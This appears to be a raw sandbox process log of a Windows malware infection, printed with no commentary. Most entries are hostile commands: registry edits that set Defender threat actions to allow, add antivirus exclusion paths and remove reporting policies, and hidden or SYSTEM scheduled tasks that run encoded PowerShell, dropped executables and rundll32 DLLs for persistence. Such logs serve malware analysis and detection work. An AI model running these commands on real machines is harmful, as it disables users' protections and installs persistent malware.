C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\IWiqTrOkU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\IWiqTrOkU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\LbkorXnFckOLpaAHvRR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\LbkorXnFckOLpaAHvRR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\fZMfFgxjsFJU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\fZMfFgxjsFJU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\nMsbjdmXnsxFC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\nMsbjdmXnsxFC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\vRXrVmfWTIUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\vRXrVmfWTIUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\bqYuHbIITFqKPmVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\bqYuHbIITFqKPmVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\RBTDPuBvwCAQssKTg\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\RBTDPuBvwCAQssKTg\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\qkTATVOZOEOSiyaz\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\qkTATVOZOEOSiyaz\" /t REG_DWORD /d 0 /reg:64;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IWiqTrOkU" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IWiqTrOkU" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IWiqTrOkU" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LbkorXnFckOLpaAHvRR" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LbkorXnFckOLpaAHvRR" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fZMfFgxjsFJU2" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fZMfFgxjsFJU2" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nMsbjdmXnsxFC" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nMsbjdmXnsxFC" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\vRXrVmfWTIUn" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\vRXrVmfWTIUn" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\bqYuHbIITFqKPmVB /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\bqYuHbIITFqKPmVB /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\RBTDPuBvwCAQssKTg /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\RBTDPuBvwCAQssKTg /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\qkTATVOZOEOSiyaz /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\qkTATVOZOEOSiyaz /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gmPcItwup" /SC once /ST 14:27:09 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gmPcItwup"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc

C:\Windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gmPcItwup"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "ZZJFebqxaSxitRKzn" /SC once /ST 06:58:33 /RU "SYSTEM" /TR "\"C:\Windows\Temp\qkTATVOZOEOSiyaz\OUlMYnQejiLZPVP\jxwpNFc.exe\" lB /YRsite_idMFl 525403 /S" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "ZZJFebqxaSxitRKzn"

C:\Windows\Temp\qkTATVOZOEOSiyaz\OUlMYnQejiLZPVP\jxwpNFc.exe

C:\Windows\Temp\qkTATVOZOEOSiyaz\OUlMYnQejiLZPVP\jxwpNFc.exe lB /YRsite_idMFl 525403 /S

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "bPIVdqgtNzoofgavuM"

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\IWiqTrOkU\oDZykN.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "dqbVGjTgjNKCoLN" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "dqbVGjTgjNKCoLN2" /F /xml "C:\Program Files (x86)\IWiqTrOkU\iEFlgHb.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /END /TN "dqbVGjTgjNKCoLN"

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "dqbVGjTgjNKCoLN"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "mBsLOSVuUwfJfv" /F /xml "C:\Program Files (x86)\fZMfFgxjsFJU2\JVScpiv.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "bUckarULzMhli2" /F /xml "C:\ProgramData\bqYuHbIITFqKPmVB\ZBDVErO.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "wjMJaUdIQxVGPBwNG2" /F /xml "C:\Program Files (x86)\LbkorXnFckOLpaAHvRR\ErUeanN.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "bqibwIbjyXxqEEXembu2" /F /xml "C:\Program Files (x86)\nMsbjdmXnsxFC\njhPluj.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "IgmMCWhKsLGKjacyM" /SC once /ST 00:29:15 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\qkTATVOZOEOSiyaz\nfrkEoNC\nuCIebF.dll\",#1 /mKsite_idfcu 525403" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "IgmMCWhKsLGKjacyM"

C:\Windows\system32\rundll32.EXE

C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\qkTATVOZOEOSiyaz\nfrkEoNC\nuCIebF.dll",#1 /mKsite_idfcu 525403

C:\Windows\SysWOW64\rundll32.exe

C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\qkTATVOZOEOSiyaz\nfrkEoNC\nuCIebF.dll",#1 /mKsite_idfcu 525403

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "ZZJFebqxaSxitRKzn"

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "IgmMCWhKsLGKjacyM"

C:\Users\Admin\AppData\Local\Temp\jsmpdfixntgalfjwtuf.exe

"C:\Users\Admin\AppData\Local\Temp\jsmpdfixntgalfjwtuf.exe"

C:\Users\Admin\AppData\Local\Temp\odspxhsojhsrcnhepqd.exe

"C:\Users\Admin\AppData\Local\Temp\odspxhsojhsrcnhepqd.exe"

C:\Users\Admin\AppData\Local\Temp\b64c58644b\Utsysc.exe

"C:\Users\Admin\AppData\Local\Temp\b64c58644b\Utsysc.exe"

C:\Users\Admin\AppData\Local\Temp\hlieequfbakhoolq.exe

"C:\Users\Admin\AppData\Local\Temp\hlieequfbakhoolq.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\s51s.0.bat" "

C:\Windows\SysWOW64\timeout.exe

timeout 3

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN Utsysc.exe /TR "C:\Users\Admin\AppData\Local\Temp\b64c58644b\Utsysc.exe" /F

C:\Users\Admin\AppData\Local\Temp\1000078001\hv.exe

"C:\Users\Admin\AppData\Local\Temp\1000078001\hv.exe"

C:\ProgramData\pinterests\XRJNZC.exe

"C:\ProgramData\pinterests\XRJNZC.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 1 /RL HIGHEST /tn "XRJNZC" /tr C:\ProgramData\pinterests\XRJNZC.exe /f

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.ammyy.com/?lang=en&page=buy.html

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7ffb998346f8,0x7ffb99834708,0x7ffb99834718

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2148,9603967266687263428,2319334505721713920,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2608 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2148,9603967266687263428,2319334505721713920,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2228 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2148,9603967266687263428,2319334505721713920,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2176 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,9603967266687263428,2319334505721713920,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3200 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,9603967266687263428,2319334505721713920,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3188 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,9603967266687263428,2319334505721713920,131072 --lang=en-US --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3756 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,9603967266687263428,2319334505721713920,131072 --lang=en-US --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4504 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,9603967266687263428,2319334505721713920,131072 --lang=en-US --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4364 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,9603967266687263428,2319334505721713920,131072 --lang=en-US --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4292 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,9603967266687263428,2319334505721713920,131072 --lang=en-US --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4084 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,9603967266687263428,2319334505721713920,131072 --lang=en-US --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3636 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

